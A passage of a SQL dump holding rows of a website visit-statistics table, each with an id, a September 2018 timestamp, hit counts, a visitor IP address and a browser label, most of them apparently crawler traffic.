'54.36.148.117','other'),(303715,1537211164,1,1,0,0,'54.36.148.237','other'),(303716,1537211273,2,2,0,0,'216.244.66.241','other'),(303717,1537211302,1,1,0,0,'54.36.148.163','other'),(303718,1537211327,1,1,0,0,'54.36.148.198','other'),(303719,1537211332,1,1,0,0,'213.179.252.5','chrome'),(303720,1537211452,1,1,0,0,'54.36.148.141','other'),(303721,1537211463,1,1,0,0,'54.36.149.63','other'),(303722,1537211506,1,1,0,0,'91.196.178.52','chrome'),(303723,1537211691,1,1,0,0,'180.76.15.150','other'),(303724,1537211968,1,1,0,0,'8.29.198.27','other'),(303725,1537212022,1,1,0,0,'8.29.198.26','other'),(303726,1537212328,1,1,0,0,'54.36.148.168','other'),(303727,1537212660,1,1,0,0,'54.36.148.150','other'),(303728,1537212906,1,1,0,0,'54.36.148.112','other'),(303729,1537213008,1,1,0,0,'54.36.148.176','other'),(303730,1537213030,1,1,0,0,'54.36.148.11','other'),(303731,1537213192,1,1,0,0,'54.36.148.151','other'),(303732,1537213204,1,1,0,0,'54.36.148.139','other'),(303733,1537213469,1,1,0,0,'54.36.149.41','other'),(303734,1537213488,1,1,0,0,'54.36.148.196','other'),(303735,1537213494,2,2,0,0,'188.163.5.19','other'),(303736,1537214025,1,1,0,0,'54.36.148.223','other'),(303737,1537214035,1,1,0,0,'54.36.148.89','other'),(303738,1537214085,1,1,0,0,'54.36.148.64','other'),(303739,1537214492,1,1,0,0,'54.36.148.116','other'),(303740,1537214634,1,1,0,0,'54.36.148.218','other'),(303741,1537215006,1,1,0,0,'54.36.148.40','other'),(303742,1537215049,1,1,0,0,'54.36.148.82','other'),(303743,1537215087,1,1,0,0,'157.55.39.190','other'),(303744,1537215343,1,1,0,0,'54.36.148.18','other'),(303745,1537215460,1,1,0,0,'54.36.149.7','other'),(303746,1537216025,1,1,0,0,'54.36.148.164','other'),(303747,1537216072,1,1,0,0,'54.36.148.239','other'),(303748,1537216207,1,1,0,0,'54.36.149.46','other'),(303749,1537216351,1,1,0,0,'8.29.198.27','other'),(303750,1537216565,1,1,0,0,'54.36.149.6','other'),(303751,1537216634,1,1,0,0,'54.36.148.254','other'),(303752,1537216797,1,1,0,0,'54.36.149.12','other'),(303753,1537216882,1,1,0,0,'54.36.149.100','other'),(303754,1537216933,3,3,0,0,'178.154.244.29','other'),(303755,1537217158,1,1,0,0,'54.36.148.194','other'),(303756,1537218077,1,1,0,0,'91.196.178.88','chrome'),(303757,1537218095,1,1,0,0,'54.36.148.204','other'),(303758,1537218157,1,1,0,0,'54.36.149.73','other'),(303759,1537218637,1,1,0,0,'54.36.149.45','other'),(303760,1537218852,1,1,0,0,'54.36.149.60','other'),(303761,1537218935,1,1,0,0,'54.36.148.128','other'),(303762,1537219033,1,1,0,0,'54.36.148.181','other'),(303763,1537219145,1,1,0,0,'54.36.149.12','other'),(303764,1537219386,2,2,0,0,'54.36.148.203','other'),(303765,1537219405,1,1,0,0,'54.36.148.255','other'),(303766,1537219455,1,1,0,0,'54.36.149.25','other'),(303767,1537219493,1,1,0,0,'54.36.148.103','other'),(303768,1537219501,1,1,0,0,'54.36.148.80','other'),(303769,1537219607,1,1,0,0,'54.36.149.92','other'),(303770,1537219609,1,1,0,0,'54.36.148.64','other'),(303771,1537219781,1,1,0,0,'54.36.149.82','other'),(303772,1537219795,1,1,0,0,'51.255.65.46','other'),(303773,1537219898,1,1,0,0,'54.36.149.47','other'),(303774,1537220143,1,1,0,0,'54.36.148.58','other'),(303775,1537220161,1,1,0,0,'66.249.65.105','chrome'),(303776,1537220351,1,1,0,0,'54.36.148.160','other'),(303777,1537220364,1,1,0,0,'54.36.148.235','other'),(303778,1537220652,1,1,0,0,'54.36.148.186','other'),(303779,1537220736,1,1,0,0,'54.36.149.5','other'),(303780,1537221503,1,1,0,0,'54.36.149.64','other'),(303781,1537221567,1,1,0,0,'54.36.148.41','other'),(303782,1537221633,1,1,0,0,'40.77.167.107','other'),(303783,1537221643,1,1,0,0,'54.36.148.192','other'),(303784,1537221805,1,1,0,0,'216.244.66.241','other'),(303785,1537221964,1,1,0,0,'54.36.149.21','other'),(303786,1537222275,1,1,0,0,'54.36.148.227','other'),(303787,1537222287,1,1,0,0,'54.36.148.201','other'),(303788,1537222485,1,1,0,0,'54.36.148.90','other'),(303789,1537222525,1,1,0,0,'54.36.148.46','other'),(303790,1537222549,1,1,0,0,'54.36.148.31','other'),(303791,1537222660,1,1,0,0,'54.36.148.126','other'),(303792,1537222695,1,1,0,0,'54.36.148.67','other'),(303793,1537222773,1,1,0,0,'157.55.39.190','other'),(303794,1537222790,2,2,0,0,'8.29.198.27','other'),(303795,1537223507,1,1,0,0,'54.36.148.115','other'),(303796,1537223903,1,1,0,0,'54.36.148.253','other'),(303797,1537224096,1,1,0,0,'91.209.11.236','other'),(303798,1537224106,1,1,0,0,'54.36.148.114','other'),(303799,1537224252,7,7,0,0,'178.154.244.29','other'),(303800,1537224260,1,1,0,0,'216.244.66.241','other'),(303801,1537224395,3,3,0,0,'5.45.207.79','other'),(303802,1537224473,1,1,0,0,'141.8.142.103','other'),(303803,1537224656,4,4,0,0,'178.154.244.11','other'),(303804,1537225077,4,4,0,0,'5.45.207.19','other'),(303805,1537225142,1,1,0,0,'54.36.149.101','other'),(303806,1537225192,1,1,0,0,'180.76.15.152','other'),(303807,1537225237,1,1,0,0,'54.36.148.126','other'),(303808,1537225316,5,5,0,0,'178.154.244.29','other'),(303809,1537225351,1,1,0,0,'54.36.148.160','other'),(303810,1537225450,1,1,0,0,'54.36.148.230','other'),(303811,1537225645,1,1,0,0,'54.36.149.98','other'),(303812,1537225782,1,1,0,0,'54.36.148.25','other'),(303813,1537225823,1,1,0,0,'54.36.148.178','other'),(303814,1537225858,1,1,0,0,'54.36.148.188','other'),(303815,1537225871,6,6,0,0,'178.154.244.11','other'),(303816,1537225882,4,4,0,0,'5.45.207.79','other'),(303817,1537225932,1,1,0,0,'54.36.149.48','other'),(303818,1537225954,1,1,0,0,'54.36.148.243','other'),(303819,1537226261,2,2,0,0,'141.8.142.108','other'),(303820,1537226366,5,5,0,0,'178.154.244.29','other'),(303821,1537226433,1,1,0,0,'54.36.149.91','other'),(303822,1537226464,1,1,0,0,'54.36.148.233','other'),(303823,1537226470,1,1,0,0,'54.36.149.87','other'),(303824,1537226504,1,1,0,0,'54.36.148.181','other'),(303825,1537226511,1,1,0,0,'54.36.148.24','other'),(303826,1537226525,2,2,0,0,'87.250.224.65','other'),(303827,1537226558,1,1,0,0,'54.36.148.136','other'),(303828,1537226683,3,3,0,0,'95.108.213.4','other'),(303829,1537226900,2,2,0,0,'5.45.207.79','other'),(303830,1537227081,1,1,0,0,'54.36.149.4','other'),(303831,1537227151,1,1,0,0,'54.36.148.216','other'),(303832,1537227169,1,1,0,0,'54.36.148.162','other'),(303833,1537227181,1,1,0,0,'8.29.198.25','other'),(303834,1537227182,4,4,0,0,'178.154.244.11','other'),(303835,1537227262,1,1,0,0,'54.36.148.92','other'),(303836,1537227309,1,1,0,0,'54.36.148.215','other'),(303837,1537227344,1,1,0,0,'54.36.148.224','other'),(303838,1537227487,6,6,0,0,'178.154.244.29','other'),(303839,1537227544,1,1,0,0,'54.36.148.70','other'),(303840,1537227652,3,3,0,0,'5.45.207.19','other'),(303841,1537227731,1,1,0,0,'54.36.148.207','other'),(303842,1537228157,1,1,0,0,'141.8.142.103','other'),(303843,1537228269,2,2,0,0,'5.45.207.79','other'),(303844,1537228359,1,1,0,0,'54.36.148.105','other'),(303845,1537228414,1,1,0,0,'54.36.148.101','other'),(303846,1537228536,1,1,0,0,'54.36.149.67','other'),(303847,1537228540,6,6,0,0,'178.154.244.29','other'),(303848,1537228620,1,1,0,0,'54.36.148.87','other'),(303849,1537228917,2,2,0,0,'95.108.213.4','other'),(303850,1537229118,3,3,0,0,'5.45.207.19','other'),(303851,1537229180,2,2,0,0,'5.45.207.79','other'),(303852,1537229262,7,7,0,0,'178.154.244.11','other'),(303853,1537229602,4,4,0,0,'178.154.244.29','other'),(303854,1537229730,1,1,0,0,'141.8.142.103','other'),(303855,1537229805,1,1,0,0,'54.36.148.164','other'),(303856,1537229831,1,1,0,0,'54.36.148.65','other'),(303857,1537230100,1,1,0,0,'54.36.149.52','other'),(303858,1537230130,1,1,0,0,'40.77.167.107','other'),(303859,1537230242,1,1,0,0,'54.36.149.76','other'),(303860,1537230304,1,1,0,0,'54.36.148.230','other'),(303861,1537230397,1,1,0,0,'54.36.149.103','other'),(303862,1537230444,1,1,0,0,'54.36.148.154','other'),(303863,1537230543,1,1,0,0,'54.36.148.97','other'),(303864,1537230599,4,4,0,0,'178.154.244.29','other'),(303865,1537230625,1,1,0,0,'199.58.86.206','other'),(303866,1537230746,1,1,0,0,'54.36.149.44','other'),(303867,1537230831,3,3,0,0,'178.154.244.11','other'),(303868,1537230886,1,1,0,0,'95.108.213.4','other'),(303869,1537231049,1,1,0,0,'46.101.204.153','firefox'),(303870,1537231155,1,1,0,0,'54.36.148.65','other'),(303871,1537231365,1,1,0,0,'54.36.148.40','other'),(303872,1537231437,1,1,0,0,'54.36.148.209','other'),(303873,1537231542,3,3,0,0,'178.154.244.29','other'),(303874,1537231554,1,1,0,0,'54.36.148.200','other'),(303875,1537231573,1,1,0,0,'54.36.148.45','other'),(303876,1537231667,1,1,0,0,'5.45.207.79','other'),(303877,1537231711,2,2,0,0,'54.36.148.232','other'),(303878,1537231992,1,1,0,0,'54.36.149.51','other'),(303879,1537232012,1,1,0,0,'54.36.149.22','other'),(303880,1537232143,1,1,0,0,'5.45.207.19','other'),(303881,1537232153,1,1,0,0,'66.249.65.125','chrome'),(303882,1537232311,1,1,0,0,'95.163.255.197','other'),(303883,1537232381,2,2,0,0,'178.154.244.11','other'),(303884,1537232491,1,1,0,0,'54.36.148.119','other'),(303885,1537232516,3,3,0,0,'178.154.244.29','other'),(303886,1537232709,1,1,0,0,'5.45.207.79','other'),(303887,1537232850,1,1,0,0,'54.36.148.141','other'),(303888,1537232912,1,1,0,0,'87.250.224.47','other'),(303889,1537233037,1,1,0,0,'157.55.39.196','other'),(303890,1537233154,1,1,0,0,'54.36.148.232','other'),(303891,1537233247,6,6,0,0,'195.154.173.101','firefox'),(303892,1537233287,1,1,0,0,'54.36.148.78','other'),(303893,1537233296,1,1,0,0,'54.36.148.250','other'),(303894,1537233489,3,3,0,0,'178.154.244.11','other'),(303895,1537233609,1,1,0,0,'8.29.198.25','other'),(303896,1537233666,1,1,0,0,'8.29.198.27','other'),(303897,1537233708,1,1,0,0,'95.108.213.4','other'),(303898,1537233866,4,4,0,0,'5.45.207.79','other'),(303899,1537233868,1,1,0,0,'37.9.113.103','other'),(303900,1537233871,1,1,0,0,'54.36.148.77','other'),(303901,1537233955,1,1,0,0,'5.45.207.8','other'),(303902,1537234183,1,1,0,0,'37.9.113.148','other'),(303903,1537234316,1,1,0,0,'54.36.149.69','other'),(303904,1537234601,1,1,0,0,'54.36.148.179','other'),(303905,1537234739,1,1,0,0,'54.36.148.149','other'),(303906,1537235088,1,1,0,0,'54.36.149.30','other'),(303907,1537235373,1,1,0,0,'54.36.149.86','other'),(303908,1537235428,1,1,0,0,'54.36.149.59','other'),(303909,1537235453,3,3,0,0,'178.154.244.29','other'),(303910,1537235527,3,3,0,0,'5.45.207.79','other'),(303911,1537235593,1,1,0,0,'95.108.213.4','other'),(303912,1537235635,1,1,0,0,'54.36.148.152','other'),(303913,1537235643,1,1,0,0,'213.180.203.9','other'),(303914,1537235678,1,1,0,0,'54.36.148.217','other'),(303915,1537235700,1,1,0,0,'54.36.149.70','other'),(303916,1537235892,1,1,0,0,'35.162.70.167','chrome'),(303917,1537236199,4,4,0,0,'178.154.244.11','other'),(303918,1537236250,1,1,0,0,'5.45.207.19','other'),(303919,1537236313,1,1,0,0,'37.9.113.148','other'),(303920,1537236368,3,3,0,0,'178.154.244.29','other'),(303921,1537236447,1,1,0,0,'35.162.214.175','chrome'),(303922,1537236548,1,1,0,0,'141.8.142.108','other'),(303923,1537236799,1,1,0,0,'54.36.149.46','other'),(303924,1537236801,1,1,0,0,'54.36.148.42','other'),(303925,1537236824,1,1,0,0,'54.36.148.154','other'),(303926,1537236917,1,1,0,0,'54.36.149.44','other'),(303927,1537236920,1,1,0,0,'54.36.149.73','other'),(303928,1537236941,1,1,0,0,'95.108.213.4','other'),(303929,1537236959,1,1,0,0,'54.36.149.104','other'),(303930,1537237034,1,1,0,0,'54.36.148.213','other'),(303931,1537237298,1,1,0,0,'54.36.149.20','other'),(303932,1537237456,1,1,0,0,'54.36.148.129','other'),(303933,1537237518,1,1,0,0,'54.36.149.16','other'),(303934,1537237522,1,1,0,0,'54.36.148.202','other'),(303935,1537238006,1,1,0,0,'54.36.148.14','other'),(303936,1537238015,1,1,0,0,'8.29.198.26','other'),(303937,1537238252,1,1,0,0,'5.45.207.19','other'),(303938,1537238289,2,2,0,0,'178.154.244.11','other'),(303939,1537238301,1,1,0,0,'178.154.171.27','other'),(303940,1537238434,1,1,0,0,'87.250.224.47','other'),(303941,1537238485,3,3,0,0,'141.8.142.103','other'),(303942,1537238865,4,4,0,0,'178.154.244.29','other'),(303943,1537239205,1,1,0,0,'40.77.167.107','other'),(303944,1537239290,1,1,0,0,'178.154.244.11','other'),(303945,1537239440,1,1,0,0,'5.45.207.19','other'),(303946,1537240346,1,1,0,0,'178.154.244.29','other'),(303947,1537240388,1,1,0,0,'5.45.207.79','other'),(303948,1537241019,2,2,0,0,'95.108.213.4','other'),(303949,1537241133,6,6,0,0,'195.154.173.101','firefox'),(303950,1537241227,1,1,0,0,'178.154.244.65','other'),(303951,1537241361,4,4,0,0,'5.45.207.19','other'),(303952,1537241454,3,3,0,0,'178.154.244.11','other'),(303953,1537241520,3,3,0,0,'5.45.207.79','other'),(303954,1537241526,3,3,0,0,'178.154.244.29','other'),(303955,1537241651,1,1,0,0,'95.108.181.54','other'),(303956,1537241652,1,1,0,0,'37.9.113.148','other'),(303957,1537241827,1,1,0,0,'141.8.142.108','other'),(303958,1537242091,3,3,0,0,'95.108.213.4','other'),(303959,1537242418,1,1,0,0,'54.36.148.237','other'),(303960,1537242461,1,1,0,0,'54.36.148.207','other'),(303961,1537242713,3,3,0,0,'178.154.244.11','other'),(303962,1537242729,1,1,0,0,'54.36.149.25','other'),(303963,1537242740,1,1,0,0,'178.154.244.29','other'),(303964,1537242851,1,1,0,0,'54.36.149.1','other'),(303965,1537242910,1,1,0,0,'54.36.148.149','other'),(303966,1537243053,1,1,0,0,'5.45.207.19','other'),(303967,1537243065,1,1,0,0,'54.36.148.197','other'),(303968,1537243080,1,1,0,0,'95.163.255.171','other'),(303969,1537243126,1,1,0,0,'54.36.149.40','other'),(303970,1537243154,2,2,0,0,'5.45.207.79','other'),(303971,1537243201,1,1,0,0,'141.8.142.103','other'),(303972,1537243568,1,1,0,0,'54.36.148.83','other'),(303973,1537243571,1,1,0,0,'54.36.148.141','other'),(303974,1537243681,1,1,0,0,'54.36.149.72','other'),(303975,1537243686,2,2,0,0,'178.154.244.11','other'),(303976,1537243836,2,2,0,0,'178.154.244.29','other'),(303977,1537243871,1,1,0,0,'54.36.148.53','other'),(303978,1537243900,2,2,0,0,'54.36.148.190','other'),(303979,1537244047,1,1,0,0,'54.36.149.49','other'),(303980,1537244062,1,1,0,0,'54.36.148.246','other'),(303981,1537244070,1,1,0,0,'141.8.142.108','other'),(303982,1537244074,1,1,0,0,'216.244.66.241','other'),(303983,1537244112,1,1,0,0,'54.36.148.70','other'),(303984,1537244231,1,1,0,0,'54.36.148.18','other'),(303986,1537244254,3,3,0,0,'5.45.207.79','other'),(303987,1537244432,2,2,0,0,'8.29.198.25','other'),(303988,1537244574,1,1,0,0,'54.36.148.80','other'),(303989,1537244665,1,1,0,0,'54.36.148.204','other'),(303990,1537244740,1,1,0,0,'54.36.148.113','other'),(303991,1537244896,2,2,0,0,'178.154.244.29','other'),(303992,1537245168,3,3,0,0,'5.45.207.79','other'),(303993,1537245262,1,1,0,0,'54.36.148.60','other'),(303994,1537245368,6,6,0,0,'178.154.244.11','other'),(303995,1537245392,1,1,0,0,'141.8.142.103','other'),(303996,1537245499,1,1,0,0,'54.36.148.243','other'),(303997,1537245810,9,9,0,0,'178.154.244.29','other'),(303998,1537245836,1,1,0,0,'54.36.149.65','other'),(303999,1537245852,1,1,0,0,'54.36.148.218','other'),(304000,1537246041,1,1,0,0,'54.36.148.235','other'),(304001,1537246076,1,1,0,0,'54.36.148.74','other'),(304002,1537246196,1,1,0,0,'54.36.148.49','other'),(304003,1537246282,1,1,0,0,'54.36.148.10','other'),(304004,1537246340,1,1,0,0,'141.8.142.103','other'),(304005,1537246355,1,1,0,0,'54.36.149.49','other'),(304006,1537246361,2,2,0,0,'136.243.37.219','other'),(304007,1537246389,1,1,0,0,'54.36.148.183','other'),(304008,1537246618,1,1,0,0,'54.36.148.61','other'),(304009,1537246684,1,1,0,0,'54.36.148.209','other'),(304010,1537246763,1,1,0,0,'54.36.148.163','other'),(304011,1537246792,2,2,0,0,'178.154.244.29','other'),(304012,1537246812,1,1,0,0,'54.36.148.29','other'),(304013,1537246835,1,1,0,0,'54.36.148.210','other'),(304014,1537246890,1,1,0,0,'54.36.148.184','other'),(304015,1537247126,3,3,0,0,'178.154.244.11','other'),(304016,1537247246,1,1,0,0,'5.45.207.19','other'),(304017,1537247384,1,1,0,0,'54.36.148.129','other'),(304018,1537247409,1,1,0,0,'54.36.149.48','other'),(304019,1537247980,1,1,0,0,'54.36.148.249','other'),(304020,1537248368,1,1,0,0,'5.45.207.79','other'),(304021,1537248392,1,1,0,0,'54.36.148.197','other'),(304022,1537248468,1,1,0,0,'54.36.148.220','other'),(304023,1537248641,1,1,0,0,'178.154.244.29','other'),(304024,1537248721,1,1,0,0,'54.36.148.76','other'),(304025,1537248886,1,1,0,0,'54.36.148.128','other'),(304026,1537248896,1,1,0,0,'8.29.198.26','other'),(304027,1537248909,1,1,0,0,'54.36.149.76','other'),(304028,1537249190,1,1,0,0,'157.55.39.190','other'),(304029,1537249209,1,1,0,0,'54.36.148.53','other'),(304030,1537249228,1,1,0,0,'54.36.149.26','other'),(304031,1537249275,1,1,0,0,'54.36.149.58','other'),(304032,1537249293,1,1,0,0,'54.36.148.160','other'),(304033,1537249386,3,3,0,0,'178.154.244.11','other'),(304034,1537249471,1,1,0,0,'54.36.148.173','other'),(304035,1537249582,1,1,0,0,'54.36.148.243','other'),(304036,1537249765,1,1,0,0,'54.36.148.183','other'),(304037,1537249816,1,1,0,0,'54.36.148.226','other'),(304038,1537249829,1,1,0,0,'54.36.148.232','other'),(304039,1537249847,2,2,0,0,'178.154.244.29','other'),(304040,1537249903,1,1,0,0,'54.36.148.47','other'),(304041,1537250004,1,1,0,0,'91.196.177.46','chrome'),(304042,1537250113,1,1,0,0,'216.244.66.241','other'),(304043,1537250250,2,2,0,0,'54.36.148.140','other'),(304044,1537250455,1,1,0,0,'54.36.149.88','other'),(304045,1537250855,1,1,0,0,'54.36.149.20','other'),(304046,1537251110,1,1,0,0,'54.36.148.63','other'),(304047,1537251328,1,1,0,0,'54.36.148.137','other'),(304048,1537252106,1,1,0,0,'54.36.148.153','other'),(304049,1537252139,1,1,0,0,'54.36.148.113','other'),(304050,1537252278,1,1,0,0,'46.201.125.163','chrome'),(304051,1537252295,1,1,0,0,'216.244.66.241','other'),(304052,1537252393,3,3,0,0,'178.154.244.11','other'),(304053,1537252417,1,1,0,0,'95.108.213.4','other'),(304054,1537252426,1,1,0,0,'5.45.207.79','other'),(304055,1537252432,1,1,0,0,'5.45.207.19','other'),(304056,1537252682,1,1,0,0,'54.36.148.100','other'),(304057,1537252730,1,1,0,0,'54.36.148.229','other'),(304058,1537252795,1,1,0,0,'54.36.148.36','other'),(304059,1537252892,1,1,0,0,'54.36.148.215','other'),(304060,1537252938,1,1,0,0,'54.36.149.91','other'),(304061,1537253175,1,1,0,0,'46.174.125.28','firefox'),(304062,1537253251,1,1,0,0,'95.163.255.156','other'),(304063,1537253328,1,1,0,0,'54.36.148.187','other'),(304064,1537253336,1,1,0,0,'92.112.59.18','chrome'),(304065,1537253620,1,1,0,0,'54.36.148.104','other'),(304066,1537253931,1,1,0,0,'54.36.149.20','other'),(304067,1537253940,1,1,0,0,'54.36.148.100','other'),(304068,1537253958,1,1,0,0,'54.36.148.15','other'),(304069,1537254250,1,1,0,0,'54.36.148.235','other'),(304070,1537254586,1,1,0,0,'54.36.149.70','other'),(304071,1537254611,1,1,0,0,'54.36.148.217','other'),(304072,1537254935,1,1,0,0,'54.36.149.82','other'),(304073,1537254997,1,1,0,0,'178.154.244.29','other'),(304074,1537255062,1,1,0,0,'216.244.66.241','other'),(304075,1537255258,2,2,0,0,'8.29.198.27','other'),(304076,1537255366,1,1,0,0,'54.36.148.83','other'),(304077,1537255422,1,1,0,0,'54.36.149.27','other'),(304078,1537255582,1,1,0,0,'54.36.148.80','other'),(304079,1537255631,1,1,0,0,'54.36.148.99','other'),(304080,1537255658,1,1,0,0,'94.179.168.74','firefox'),(304081,1537255691,1,1,0,0,'54.36.148.124','other'),(304082,1537255840,1,1,0,0,'40.77.167.107','other'),(304083,1537255990,1,1,0,0,'178.154.244.11','other'),(304084,1537256210,1,1,0,0,'54.36.148.31','other'),(304085,1537256393,1,1,0,0,'54.36.148.84','other'),(304086,1537256460,1,1,0,0,'54.36.148.177','other'),(304087,1537256881,1,1,0,0,'54.36.148.249','other'),(304088,1537256997,1,1,0,0,'54.36.148.36','other'),(304089,1537257031,1,1,0,0,'54.36.149.29','other'),(304090,1537257061,1,1,0,0,'54.36.149.25','other'),(304091,1537257074,1,1,0,0,'54.36.148.122','other'),(304092,1537257236,1,1,0,0,'54.36.148.195','other'),(304093,1537257522,1,1,0,0,'91.196.178.171','chrome'),(304094,1537257587,4,4,0,0,'178.92.178.72','firefox'),(304095,1537258052,1,1,0,0,'37.52.126.206','chrome'),(304096,1537258350,1,1,0,0,'91.196.178.92','chrome'),(304097,1537258399,1,1,0,0,'54.36.148.89','other'),(304098,1537258740,1,1,0,0,'178.154.244.11','other'),(304099,1537258744,1,1,0,0,'178.154.244.29','other'),(304100,1537259146,1,1,0,0,'54.36.148.133','other'),(304101,1537259261,1,1,0,0,'192.162.35.196','msie'),(304102,1537259310,1,1,0,0,'54.36.148.180','other'),(304103,1537259536,1,1,0,0,'54.36.149.28','other'),(304104,1537259742,1,1,0,0,'8.29.198.27','other'),(304105,1537260002,1,1,0,0,'54.36.148.177','other'),(304106,1537260041,2,2,0,0,'176.96.198.174','chrome'),(304107,1537260127,1,1,0,0,'54.36.148.253','other'),(304109,1537260416,1,1,0,0,'54.36.148.145','other'),(304110,1537260499,1,1,0,0,'54.36.149.55','other'),(304111,1537260643,1,1,0,0,'54.36.148.23','other'),(304112,1537260755,1,1,0,0,'54.36.149.34','other'),(304113,1537261016,1,1,0,0,'54.36.149.6','other'),(304114,1537261090,1,1,0,0,'54.36.149.63','other'),(304115,1537261232,1,1,0,0,'40.77.167.107','other'),(304116,1537261544,1,1,0,0,'54.36.149.76','other'),(304117,1537261646,1,1,0,0,'54.36.148.240','other'),(304118,1537261705,1,1,0,0,'54.36.148.159','other'),(304119,1537262003,1,1,0,0,'54.36.148.249','other'),(304120,1537262061,1,1,0,0,'54.36.148.78','other'),(304121,1537262070,4,4,0,0,'66.249.65.99','chrome'),(304122,1537262123,2,2,0,0,'54.36.148.175','other'),(304123,1537262173,1,1,0,0,'54.36.149.65','other'),(304124,1537262279,1,1,0,0,'54.36.149.66','other'),(304125,1537262346,1,1,0,0,'54.36.148.88','other'),(304126,1537262462,3,3,0,0,'66.249.65.103','chrome'),(304127,1537262475,1,1,0,0,'54.36.148.98','other'),(304128,1537262580,5,5,0,0,'66.249.65.105','chrome'),(304129,1537262591,1,1,0,0,'54.36.148.58','other'),(304130,1537262776,1,1,0,0,'54.36.149.105','other'),(304131,1537262847,1,1,0,0,'54.36.149.30','other'),(304132,1537263221,1,1,0,0,'66.249.65.99','chrome'),(304133,1537263399,1,1,0,0,'91.196.178.136','firefox'),(304134,1537263828,2,2,0,0,'178.154.244.29','other'),(304135,1537263832,1,1,0,0,'178.154.244.11','other'),(304136,1537264074,1,1,0,0,'54.36.148.53','other'),(304137,1537264095,1,1,0,0,'54.36.148.18','other'),(304138,1537264128,1,1,0,0,'54.36.149.71','other'),(304139,1537264213,1,1,0,0,'54.36.148.55','other'),(304140,1537264293,1,1,0,0,'54.36.148.38','other'),(304141,1537264424,1,1,0,0,'193.19.152.14','firefox'),(304142,1537264497,1,1,0,0,'54.36.149.82','other'),(304143,1537264641,1,1,0,0,'54.36.148.246','other'),(304144,1537264973,1,1,0,0,'54.36.148.85','other'),(304145,1537264983,1,1,0,0,'54.36.149.101','other'),(304146,1537265037,1,1,0,0,'54.36.149.92','other'),(304147,1537265150,1,1,0,0,'54.36.148.149','other'),(304148,1537265160,1,1,0,0,'54.36.148.143','other'),(304149,1537265185,1,1,0,0,'54.36.148.118','other'),(304150,1537265589,1,1,0,0,'54.36.149.14','other'),(304151,1537265736,1,1,0,0,'54.36.148.174','other'),(304152,1537265941,1,1,0,0,'54.36.148.225','other'),(304153,1537266101,2,2,0,0,'8.29.198.26','other'),(304154,1537266195,1,1,0,0,'54.36.148.102','other'),(304155,1537266220,1,1,0,0,'54.36.148.25','other'),(304156,1537266397,1,1,0,0,'54.36.149.92','other'),(304157,1537266494,1,1,0,0,'54.36.148.36','other'),(304158,1537266635,1,1,0,0,'178.95.57.137','chrome'),(304159,1537266794,1,1,0,0,'82.145.223.76','chrome'),(304160,1537267247,1,1,0,0,'54.36.148.15','other'),(304161,1537267304,1,1,0,0,'54.36.148.100','other'),(304162,1537267374,1,1,0,0,'54.36.148.155','other'),(304163,1537267930,1,1,0,0,'54.36.149.72','other'),(304164,1537267940,1,1,0,0,'54.36.148.200','other'),(304165,1537268029,1,1,0,0,'54.36.149.58','other'),(304166,1537268371,1,1,0,0,'54.36.148.32','other'),(304167,1537268477,1,1,0,0,'54.36.148.229','other'),(304168,1537268508,1,1,0,0,'54.36.149.103','other'),(304169,1537268534,1,1,0,0,'54.36.149.67','other'),(304170,1537268559,1,1,0,0,'54.36.149.55','other'),(304171,1537268619,1,1,0,0,'54.36.149.28','other'),(304172,1537268630,1,1,0,0,'54.36.148.66','other'),(304173,1537269205,1,1,0,0,'130.180.216.39','chrome'),(304174,1537269433,1,1,0,0,'46.211.38.177','chrome'),(304175,1537269966,1,1,0,0,'91.196.178.77','firefox'),(304176,1537270021,1,1,0,0,'95.132.27.20','firefox'),(304177,1537270380,1,1,0,0,'176.241.128.113','chrome'),(304178,1537270581,1,1,0,0,'8.29.198.25','other'),(304179,1537270936,1,1,0,0,'77.93.41.218','chrome'),(304180,1537271189,1,1,0,0,'95.163.255.104','other'),(304181,1537271311,1,1,0,0,'178.140.85.133','msie'),(304182,1537271790,1,1,0,0,'207.46.13.28','other'),(304183,1537272001,2,2,0,0,'188.163.16.129','chrome'),(304184,1537272270,1,1,0,0,'216.244.66.241','other'),(304185,1537272633,1,1,0,0,'37.54.60.221','chrome'),(304186,1537272699,1,1,0,0,'207.46.13.28','other'),(304187,1537275178,2,2,0,0,'95.132.27.20','firefox'),(304188,1537276627,1,1,0,0,'178.154.244.11','other'),(304189,1537276733,1,1,0,0,'94.231.176.242','chrome'),(304190,1537276944,2,2,0,0,'8.29.198.25','other'),(304191,1537277244,1,1,0,0,'62.205.134.182','msie'),(304192,1537277479,1,1,0,0,'54.36.148.149','other'),(304193,1537277801,1,1,0,0,'54.36.148.13','other'),(304194,1537277948,1,1,0,0,'54.36.148.95','other'),(304195,1537277979,2,2,0,0,'216.244.66.241','other'),(304196,1537278103,1,1,0,0,'54.36.149.5','other'),(304197,1537278215,1,1,0,0,'54.36.148.252','other'),(304198,1537278285,1,1,0,0,'54.36.148.154','other'),(304199,1537278367,1,1,0,0,'54.36.148.214','other'),(304200,1537278816,1,1,0,0,'54.36.148.40','other'),(304201,1537278906,1,1,0,0,'54.36.148.216','other'),(304202,1537279157,2,2,0,0,'178.154.244.29','other'),(304203,1537279164,1,1,0,0,'5.45.207.79','other'),(304204,1537279490,1,1,0,0,'54.36.149.75','other'),(304205,1537279918,1,1,0,0,'54.36.148.81','other'),(304206,1537280066,1,1,0,0,'180.76.15.26','other'),(304207,1537280121,1,1,0,0,'82.207.49.106','chrome'),(304208,1537280137,1,1,0,0,'54.36.148.102','other'),(304209,1537280303,1,1,0,0,'91.196.178.169','chrome'),(304210,1537280405,1,1,0,0,'54.36.149.107','other'),(304211,1537280544,1,1,0,0,'216.244.66.241','other'),(304212,1537280626,1,1,0,0,'54.36.148.153','other'),(304213,1537280995,1,1,0,0,'54.36.149.99','other'),(304214,1537281054,1,1,0,0,'188.230.43.254','other'),(304215,1537281096,1,1,0,0,'54.36.148.176','other'),(304216,1537281253,2,2,0,0,'178.154.244.29','other'),(304217,1537281419,1,1,0,0,'8.29.198.25','other'),(304218,1537281662,1,1,0,0,'54.36.148.53','other'),(304219,1537281733,1,1,0,0,'5.45.207.79','other'),(304220,1537281766,1,1,0,0,'54.36.149.89','other'),(304221,1537281802,1,1,0,0,'54.36.149.105','other'),(304222,1537281971,1,1,0,0,'40.77.167.107','other'),(304223,1537282668,1,1,0,0,'212.26.140.60','firefox'),(304224,1537282874,1,1,0,0,'54.36.148.230','other'),(304225,1537283476,1,1,0,0,'188.230.43.254','other'),(304226,1537284328,1,1,0,0,'95.163.255.187','other'),(304227,1537284791,1,1,0,0,'195.154.173.101','firefox'),(304228,1537285854,1,1,0,0,'188.230.43.254','other'),(304229,1537286037,1,1,0,0,'31.43.31.187','chrome'),(304230,1537286547,1,1,0,0,'195.154.